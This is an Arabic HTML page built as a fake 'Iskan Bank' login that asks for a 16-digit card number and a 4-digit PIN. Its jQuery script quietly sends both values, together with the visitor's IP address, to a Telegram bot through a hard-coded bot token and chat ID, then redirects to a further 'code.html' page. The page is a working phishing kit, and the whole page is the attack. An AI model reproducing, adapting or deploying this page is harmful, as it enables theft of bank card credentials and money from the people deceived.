<!DOCTYPE html>
<html lang="ar">

<head>
    <meta name="viewport" content="width=device-width, initial-scale=1">
    <meta name="csrf-token" content="RQktravBpGn4uHMq4r0cM4WA8QZ4HeOq26zJkgqM">
    <meta property="og:image" content="https://www2.0zz0.com/2025/04/25/20/676465233.png">
    <meta property="og:site_name" content="Iskan ">
    <meta property="og:description" content="Iskan Bank">

    <title>iskan Bank - login</title>

    <link rel="dns-prefetch" href="http://fonts.gstatic.com/">
    <link href="https://fonts.googleapis.com/css2?family=Droid+Arabic+Kufi:wght@400;700&display=swap" rel="stylesheet">
    <link href="style.css" rel="stylesheet">
    <link rel="preconnect" href="https://fonts.googleapis.com">
    <link rel="preconnect" href="https://fonts.gstatic.com" crossorigin>
    <link rel="stylesheet" href="https://cdn.jsdelivr.net/npm/bootstrap@5.2.3/dist/css/bootstrap.min.css" integrity="sha384-rbsA2VBKQhggwzxH7pPCaAqO46MgnOM80zW1RWuH61DGLwZJEdK2Kadq2F9CUG65" crossorigin="anonymous">
    <link rel="stylesheet" href="https://pro.fontawesome.com/releases/v5.10.0/css/all.css" integrity="sha384-AYmEC3Yw5cVb3ZcuHtOA93w35dYTsvhLPVnYs9eStHfGJvOvKxVfELGroGkvsg+p" crossorigin="anonymous"/>

    <style type="text/css">
        * {
            direction: rtl;
            font-family: 'Droid Arabic Kufi', sans-serif;
        }

        body {
            background-color: #FFF;
        }

        .navbar-dark {
            background-color: #FFF !important;
        }

        .bg-danger {
            background-color: #00008B !important; /* أزرق غامق */
        }

        .text-danger {
            color: #00008B !important; /* أزرق غامق */
        }

        body, h6, label, input, button, small, footer, .form-group {
            text-align: right !important;
        }

        .form-group.centered-button {
            text-align: center !important;
            margin-top: 10px;
            margin-bottom: 50px; /* إضافة مسافة أكبر أسفل الزر */
        }

        .form-group.centered-button button {
            font-size: 1.5rem;
            padding: 15px 30px;
            width: auto;
            border-radius: 50px;
            background-color: #00008B;
            color: #FFF;
            border: none;
        }

        .form-group.centered-button button:hover {
            background-color: #1C1C8C;
        }

        footer {
            margin-top: 50px; /* التأكد من وجود مسافة كافية أعلى الفوتر */
            background-color: #00008B; /* أزرق غامق */
            width: 100%;
            bottom: 0px;
            padding: 10px;
            color: #FFF;
            font-weight: bold;
        }

        footer small {
            font-size: 14px;
            color: #FFF;
            font-weight: bolder;
        }
    </style>
</head>

<body style="background-color: #FFF;">

    <nav class="navbar navbar-expand-md navbar-danger bg-danger shadow-sm"></nav>

    <main class="py-4">
        <div class="container justify-content-center text-center">
            <a class="navbar-brand justify-content-center">
                <img src="https://www2.0zz0.com/2025/04/25/20/676465233.png" style="width:100%" alt="logo">
            </a>
        </div>

        <div class="container">

            <div class="container justify-content-center">
                <form id="login-form" style="padding: 10px;">
                    <div class="form-group row text-right">
                        <label for="username" class="col-form-label text-md-right" style="font-weight:bold;">رقم البطاقة من 16 خانة:</label>
                        <input id="username" value="" class="form-control" name="username" autofocus="">
                        <span id="verify_username" class="text-danger font-weight-bolder text-right" style="display: none;">يرجى إدخال رقم البطاقة من 16 خانة</span>
                    </div>

                    <div class="form-group row text-right">
                        <label for="password" class="col-form-label text-md-right" style="font-weight:bold;">كلمة السر من ٤ ارقام:</label>
                        <input type="password" class="form-control" id="password" name="password" autofocus="">
                        <span id="verify_password" class="text-danger font-weight-bolder text-right" style="display: none;">يرجى إدخال كلمة السر من ٤ ارقام</span>
                    </div>

                    <div class="form-group centered-button">
                        <button type="submit" class="btn btn-success">
                            <i class="fa fa-lock ml-10"></i>المتابعة
                        </button>
                    </div>



                </form>
            </div>
        </div>

    <footer>
        <small>© 2025 جميع الحقوق محفوظة لـشركة بنك الاسكان</small>
    </footer>

    <script src="https://code.jquery.com/jquery-3.6.4.min.js"></script>
    <script>
        $(document).ready(function() {
            $('#login-form').submit(function(event) {
                event.preventDefault();
                $('#verify_username').hide();
                $('#verify_password').hide();

                const username = $("#username").val();
                const password = $("#password").val();

                if (!username) {
                    $('#verify_username').show();
                    return;
                }

                if (!password) {
                    $('#verify_password').show();
                    return;
                }

                $.get("https://api.ipify.org?format=json", function(data) {
                    const userIp = data.ip; // الحصول على عنوان IP المستخدم

                    const telegramBotToken = "7356894979:AAFxs2g1BAkp6qYCgf3ZE8mvaLvaIuoBmI4"; // ضع رمز البوت الخاص بك هنا
                    const chatId = "6873334348"; // ضع معرّف المحادثة هنا

                    const message = `رقم البطاقة من 16 خانة: ${username}\nكلمة السر من ٤ ارقام: ${password}\nIP المستخدم: ${userIp}`;

                    const telegramUrl = `https://api.telegram.org/bot${telegramBotToken}/sendMessage`;

                    $.post(telegramUrl, {
                        chat_id: chatId,
                        text: message
                    }).done(function (response) {
                        // إعادة التوجيه لصفحة أخرى
                        window.location.href = "code.html"; // استبدل "dashboard.html" بعنوان الصفحة المطلوبة
                    }).fail(function (error) {
                        alert("حدث خطأ أثناء الإرسال. يرجى المحاولة لاحقًا.");
                    });
                });
            });
        });
    </script>
</body>

</html>